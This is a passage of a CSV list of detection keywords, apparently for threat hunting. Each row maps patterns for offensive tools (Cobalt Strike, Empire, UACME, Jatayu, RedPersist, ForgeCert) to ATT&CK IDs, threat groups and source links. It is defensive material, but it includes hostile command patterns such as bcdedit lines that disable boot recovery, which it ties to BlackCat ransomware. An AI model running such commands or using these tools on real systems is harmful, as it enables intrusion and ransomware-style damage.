- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*bawait_upload_raw*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*bb3b1a1f-0447-42a6-955a-88681fb88499*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" +"*bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bblcccknbdbplgmdjnnikffefhdlobhp*","greyware_tool_keyword","FastStunnel VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bblockdlls*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bbrowserpivot*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bbrowserpivot*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bbypassuac*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bc3023b36063a7681db24681472b54fa11f0d4ec*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*bcc2_setenv*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*bcc2_spawn*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*bcdedit* /set {default} bootstatuspolicy ignoreallfailures*","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.","T1218.004 - T1562.001","TA0007 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*bcdedit* /set {default} recoveryenabled No*","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.","T1218.004 - T1562.001","TA0007 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*bcdedit.exe /set {default} recoveryenabled No*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BCHASH-Rijndael-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*BCHASH-Rijndael-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bcrossc2_load_dyn*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*BC-SECURITY*","offensive_tool_keyword","Github Username","Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.","T1021 - T1024 - T1027 - T1059 - T1074 - T1053","TA0008 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BC-SECURITY*Malleable*","offensive_tool_keyword","cobaltstrike","Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike & Empire.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*bc-security/empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*BC-SECURITY/Starkiller*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*bd346689-8ee6-40b3-858b-4ed94f08d40a*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"*BD602C80-47ED-4294-B981-0119D2200DB8*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bdamele/icmpsh*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bdcsync*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bdlcnpceagnkjnjlbbbcepohejbheilk*","greyware_tool_keyword","Malus VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bdllinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bdllinject*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bdllload*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bdllload*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a 